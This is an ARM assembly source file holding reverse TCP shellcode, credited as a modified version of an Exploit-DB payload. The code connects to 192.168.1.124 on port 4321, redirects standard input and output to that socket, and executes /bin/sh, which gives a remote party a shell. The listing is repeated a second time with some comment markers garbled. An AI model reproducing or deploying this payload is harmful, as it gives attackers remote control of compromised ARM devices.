dominusmi/ARM_reverse_TCP.s

## ARM_reverse_TCP.s
// This is a slightly modified version of an ARM shellcode to open a reverse TCP shell.
// The original can be found here: https://www.exploit-db.com/exploits/46258
// and was made by Gokul Babu - https://www.linkedin.com/in/gokul-babu-452b3b112/

.section .text
.global _start
_start:
.ARM
	add r3,pc,#1
	bx r3
.THUMB
//socket:
	mov r0,#2
	mov r1,#1
	mov r7,#200
	add r7,#81
	svc #1
	push {r0,r1,r2} /*store all values r0=3,r1=1,r2=0*/
//connect:
	adr r1, sockaddr
	strb r2,[r1,#1]
	mov r2,#16
	add r7,#2
	svc #1
//dup2:
//dup2(3,2)/*No need of stderr, program works fine without stderr*/
	pop {r0,r1,r2} /* Restoring all values */
	mov r7,#63
//dup2(3,1)
	svc #1
//dup2(3,0) -> but gets changed to dup2(1,0)-see strace debug file for reference
	sub r1,#1
	svc #1
//execve:
	adr r0,exc
	strb r1,[r0,#7]
	mov r7,#11
	svc #1
exc:
  .ascii "/bin/shX"
sockaddr:
	.ascii "\x02\xff"
	.ascii "\x10\xE1" //port 4321
	.byte 192,168,1,124 //IP
	// This is a slightly modified version of an ARM shellcode to open a reverse TCP shell.
	// The original can be found here: https://www.exploit-db.com/exploits/46258
	// and was made by Gokul Babu - https://www.linkedin.com/in/gokul-babu-452b3b112/

	.section .text
	.global _start
	_start:
	.ARM
	add r3,pc,#1
	bx r3
	.THUMB
	//socket:
	mov r0,#2
	mov r1,#1
	mov r7,#200
	add r7,#81
	svc #1
	push {r0,r1,r2} /store all values r0=3,r1=1,r2=0/
	//connect:
	adr r1, sockaddr
	strb r2,[r1,#1]
	mov r2,#16
	add r7,#2
	svc #1
	//dup2:
	//dup2(3,2)/No need of stderr, program works fine without stderr/
	pop {r0,r1,r2} /* Restoring all values */
	mov r7,#63
	//dup2(3,1)
	svc #1
	//dup2(3,0) -> but gets changed to dup2(1,0)-see strace debug file for reference
	sub r1,#1
	svc #1
	//execve:
	adr r0,exc
	strb r1,[r0,#7]
	mov r7,#11
	svc #1
	exc:
	.ascii "/bin/shX"
	sockaddr:
	.ascii "\x02\xff"
	.ascii "\x10\xE1" //port 4321
	.byte 192,168,1,124 //IP